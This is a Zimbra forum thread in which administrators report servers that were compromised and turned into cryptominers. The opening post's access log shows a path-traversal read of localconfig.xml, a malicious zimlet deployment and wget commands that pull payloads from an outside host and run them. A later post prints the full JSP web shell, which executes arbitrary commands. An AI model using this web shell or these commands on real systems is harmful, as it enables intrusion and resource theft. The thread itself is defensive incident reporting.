Results 1 to 8 of 8

Thread: Zimbra hack

  1. #1
    jan.pekar is offline Beginner Member
    Join Date
    Jan 2014
    Posts
    1
    Rep Power
    1

    Unhappy Zimbra hack

    Yesterday I noticed hack of my zimbra server.
    I attached access log of zimbra server.
    It looks that hacker uses some vulnerability of zimbra scripts to upload files to /var/tmp/ and execute them as "zimbra" user. In my case some cpumining scripts.
    I have 7.2.2_GA_2852 zimbra version. Zimbra 8.0.4.GA.5737 seems unaffected (yet).
    I know, that I should upgrade, so concider this as question - are newer versons susceptible to this attack or are "safe"? Which version I shoud install? Is comunity aware of this security problem? Is there any quick fix to this (except blocking 7071 port of zimbra from Internet).
    __MYIP__ is replaced instead of IP of my server.

    Thank you very much for reaction.
    Jan Pekar @ Imatic

    179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 976 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "POST /service/admin/soap HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:06 +0000] "POST /service/admin/soap HTTP/1.1" 200 9624 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:08 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:10 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 247 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:12 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:14 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:16 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 253 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:19 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:20 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:22 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb HTTP/1.1" 200 228 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=killall+-9+a+b+minerd+minerd32+minerd64+perl HTTP/1.1" 500 7009 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:43 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=perl+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 217 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:33 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"

  2. #2
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,492
    Rep Power
    56

    Default

    Quote Originally Posted by jan.pekar View Post
    I know, that I should upgrade, ...
    Then do so (immediately) after taking a backup and read the recent announcements and post again if you still have problems.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    kero99 is offline New Member
    Join Date
    Nov 2011
    Posts
    3
    Rep Power
    3

    Default

    Confirmed, all our Zimbra server are under attack with a Zimbra exploit. A bitcoin miner in remote ejecution in all servers:

    zimbra 16208 1 99 Jan01 ? 3-11:09:22 ./minerd32 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x
    zimbra 18558 1 99 Jan01 ? 2-07:52:03 ./minerd64 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x

    Best Regards

  4. #4
    timok is offline Starter Member
    Join Date
    Jan 2014
    Posts
    1
    Rep Power
    1

    Default

    Next to this minerd we had two additional zimlets installed: com_zimbra_example_simplejspaction and com_zimbra_example_simplejspaction2
    The included "cmd.jsp" and "xd.jsp" write GET content to a file:

    cat com_zimbra_example_simplejspaction2/xd.jsp
    Code:
    <%@ page import="java.util.*,java.io.*"%>
    <% %>
    <HTML>
    <BODY>
    <FORM METHOD="GET" NAME="comments" ACTION="">
    <INPUT TYPE="text" NAME="comment">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    if (request.getParameter("comment") != null) {
    out.println("Command: " + request.getParameter("comment") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) { out.println(disr); disr = dis.readLine(); }
    }
    %>
    </pre>
    <p>loldongs</p>
    </BODY>
    </HTML>

  5. #5
    Hien is offline New Member
    Join Date
    Dec 2013
    Location
    HCMC, Viet Nam
    Posts
    4
    Rep Power
    1

    Default

    Quote Originally Posted by kero99 View Post
    Confirmed, all our Zimbra server are under attack with a Zimbra exploit. A bitcoin miner in remote ejecution in all servers:

    zimbra 16208 1 99 Jan01 ? 3-11:09:22 ./minerd32 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x
    zimbra 18558 1 99 Jan01 ? 2-07:52:03 ./minerd64 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x

    Best Regards
    Hello,

    Please visit this thread zimbra 0-day , it contains a lot of useful information relates your problem.

  6. #6
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,492
    Rep Power
    56

    Default

    Quote Originally Posted by kero99 View Post
    Confirmed, all our Zimbra server are under attack with a Zimbra exploit. A bitcoin miner in remote ejecution in all servers:
    Then you should upgrade to the most recent Zimbra version as soon as possible.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  7. #7
    kero99 is offline New Member
    Join Date
    Nov 2011
    Posts
    3
    Rep Power
    3

    Default

    Thanks Phoenix, solved updating to last release =)

    Best Regards

  8. #8
    freegenie is offline Starter Member
    Join Date
    Jul 2012
    Posts
    1
    Rep Power
    3

    Default

    Hi, I did the upgrade to the lastest version of 7.x branch. Here is my upgrade log:

    1393351008: UPGRADED zimbra-core_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351016: UPGRADED zimbra-ldap_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351023: UPGRADED zimbra-logger_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351037: UPGRADED zimbra-mta_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351045: UPGRADED zimbra-snmp_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351075: UPGRADED zimbra-store_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351084: UPGRADED zimbra-apache_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351094: UPGRADED zimbra-spell_7.2.6_GA_2926.UBUNTU10_64_amd64.deb

    But the problem is still there. Is the 8.x branch the only one to have a fix for this?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Survived my first hack attempt today
    By drdre in forum Administrators
    Replies: 6
    Last Post: 12-22-2011, 05:14 PM
  2. Replies: 0
    Last Post: 08-28-2008, 01:10 AM
  3. Does Z support the plus-hack?
    By Baylink in forum Developers
    Replies: 5
    Last Post: 08-27-2008, 06:57 AM
  4. Sendmail split domain/lmtp hack
    By Rich Graves in forum Migration
    Replies: 2
    Last Post: 08-22-2007, 07:38 AM
  5. Ubuntu Breezy Hack.
    By adobrin in forum Announcements
    Replies: 6
    Last Post: 06-09-2006, 07:53 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •